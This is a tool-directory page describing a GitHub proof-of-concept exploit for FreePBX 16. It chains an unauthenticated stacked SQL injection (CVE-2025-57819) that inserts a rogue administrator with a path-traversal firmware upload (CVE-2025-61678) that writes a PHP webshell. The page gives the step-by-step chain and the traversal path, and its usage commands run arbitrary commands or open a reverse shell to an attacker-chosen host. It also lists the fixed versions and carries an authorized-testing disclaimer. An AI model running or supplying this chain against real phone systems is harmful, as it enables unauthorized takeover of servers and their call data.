Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
FreePBX-CVE-2025-57819-RCE — Unauthenticated SQL injection and arbitrary file upload exploit chain for FreePBX 16, achieving remote code execution via admin creation and webshell deployment. | Kitploit
Tools/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

Unauthenticated SQL injection and arbitrary file upload exploit chain for FreePBX 16, achieving remote code execution via admin creation and webshell deployment.

View Repository
13103 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

FreePBX 16 — Unauthenticated SQLi to RCE

Proof-of-concept exploit chaining two FreePBX vulnerabilities to go from zero access to remote code execution on FreePBX 16.

CVEComponentImpact
CVE-2025-57819Endpoint module loader (brand parameter)Unauthenticated stacked SQL injection
CVE-2025-61678Endpoint Manager firmware uploader (fwbrand parameter)Authenticated arbitrary file upload (path traversal)

How it works

  1. Create an admin (CVE-2025-57819) — a stacked SQL injection reachable without authentication via the namespaced endpoint loader is used to INSERT a brand-new full-access administrator directly into the ampusers table.
  2. Authenticate — the PoC logs into the admin panel as the freshly created user.
  3. Drop a webshell (CVE-2025-61678) — the Endpoint Manager firmware upload handler is abused with a ../../../var/www/html/<dir> traversal in fwbrand to write a PHP webshell into the web root.
  4. Execute — run a single command or receive an interactive reverse shell.

Affected versions

FreePBX 16 (Endpoint module prior to 16.0.92). Also patched in 17.0.6. Update to a fixed release.

Usage

# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Options

FlagDescription
--rhostTarget host (required)
--rportTarget port (default 443)
--httpUse HTTP instead of HTTPS
--lhost / --lportReverse-shell callback address
--commandRun a single command instead of a shell

Requirements

pip install requests pwntools

Disclaimer

For authorized security testing and educational purposes only. Use it exclusively on systems you own or have explicit written permission to test. The author assumes no liability for misuse.

Keywords

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · unauthenticated SQL injection · stacked query injection · endpoint module · Endpoint Manager · authenticated file upload · path traversal · remote code execution · RCE · PoC · exploit · VoIP security


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

Download Tool